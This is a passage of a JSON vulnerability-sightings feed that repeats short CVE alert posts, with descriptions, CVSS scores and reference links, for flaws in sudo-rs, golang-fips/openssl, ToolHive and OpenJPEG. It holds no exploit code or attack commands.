"cbb16913-06e8-4661-a54d-cce6c36b1acf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98CV-WQJX-WX8F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16062", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46717\n\ud83d\udd25 CVSS Score: 3.3 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: sudo-rs is a memory safe implementation of sudo and su written in Rust. Prior to version 0.2.6, users with no (or very limited) sudo privileges can determine whether files exists in folders that they otherwise cannot access using `sudo --list `. Users with local access to a machine can discover the existence/non-existence of certain files, revealing potentially sensitive information in the file names. This information can also be used in conjunction with other attacks. Version 0.2.6 fixes the vulnerability.\n\ud83d\udccf Published: 2025-05-12T14:52:55.408Z\n\ud83d\udccf Modified: 2025-05-12T22:06:55.312Z\n\ud83d\udd17 References:\n1. https://github.com/trifectatechfoundation/sudo-rs/security/advisories/GHSA-98cv-wqjx-wx8f\n2. https://github.com/trifectatechfoundation/sudo-rs/releases/tag/v0.2.6", "creation_timestamp": "2025-05-12T22:29:13.000000Z"}, {"uuid": "23c4a984-e078-4765-9f7d-a0e6c65d1a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1561", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "e3a04ed0-600b-4d5d-aa64-590870277e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ5P-W2V5-FJM6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16064", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47274\n\ud83d\udd25 CVSS Score: 2.4 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N)\n\ud83d\udd39 Description: ToolHive is a utility designed to simplify the deployment and management of Model Context Protocol (MCP) servers. Due to the ordering of code used to start an MCP server container, versions of ToolHive prior to 0.0.33 inadvertently store secrets in the run config files which are used to restart stopped containers. This means that an attacker who has access to the home folder of the user who starts the MCP server can read secrets without needing access to the secrets store itself. This only applies to secrets which were used in containers whose run configs exist at a point in time - other secrets remaining inaccessible. ToolHive 0.0.33 fixes the issue. Some workarounds are available. Stop and delete any running MCP servers, or manually remove any runconfigs from `$HOME/Library/Application Support/toolhive/runconfigs/` (macOS) or `$HOME/.state/toolhive/runconfigs/` (Linux).\n\ud83d\udccf Published: 2025-05-12T14:57:46.781Z\n\ud83d\udccf Modified: 2025-05-12T22:06:42.029Z\n\ud83d\udd17 References:\n1. https://github.com/stacklok/toolhive/security/advisories/GHSA-xj5p-w2v5-fjm6\n2. https://github.com/stacklok/toolhive/commit/e8efa1b1d7b0776a39339257d30bf6c4a171f2b8\n3. https://github.com/stacklok/toolhive/releases/tag/v0.0.33", "creation_timestamp": "2025-05-12T22:29:15.000000Z"}, {"uuid": "57a37e1a-b10d-4274-b855-e21d9b9028e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:3265", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "2b23daa9-92ab-4b14-985b-c53cb632ed5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4146", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "038cb2e4-c69b-4842-93c8-b0b45ceeb9b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1567", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "9f107a59-2638-457b-a1fd-5dca4b983daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7309", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16088", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56827\n\ud83d\udd25 CVSS Score: 5.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the OpenJPEG project. A heap buffer overflow condition may be triggered when certain options are specified while using the opj_decompress utility.  This can lead to an application crash or other undefined behavior.\n\ud83d\udccf Published: 2025-01-09T03:40:30.512Z\n\ud83d\udccf Modified: 2025-05-13T09:15:21.784Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:7309\n2. https://access.redhat.com/security/cve/CVE-2024-56827\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2335174\n4. https://github.com/uclouvain/openjpeg/commit/e492644fbded4c820ca55b5e50e598d346e850e8\n5. https://github.com/uclouvain/openjpeg/issues/1564", "creation_timestamp": "2025-05-13T09:30:36.000000Z"}, {"uuid": "7b24c7e7-0f5f-4142-8f78-e7be5da1828c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/konard/c90145ec39e2e06ff366117f69ad7547", "content": "", "creation_timestamp": "2026-04-26T20:43:33.000000Z"}, {"uuid": "2b2b85ca-07c5-4505-a226-f5c4d59c7b74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m7jm-9gc2-mpf2", "type": "seen", "source": "https://gist.github.com/konard/c90145ec39e2e06ff366117f69ad7547", "content": "", "creation_timestamp": "2026-04-26T20:43:33.000000Z"}, {"uuid": "dbea4651-df92-4dcc-b2d7-ee969b5c19a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1462", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "bd28bfb2-9e91-491b-8da9-8b857e8f8d7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4672", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "baad7338-7251-45ad-9a05-a5385f6129c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2767", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 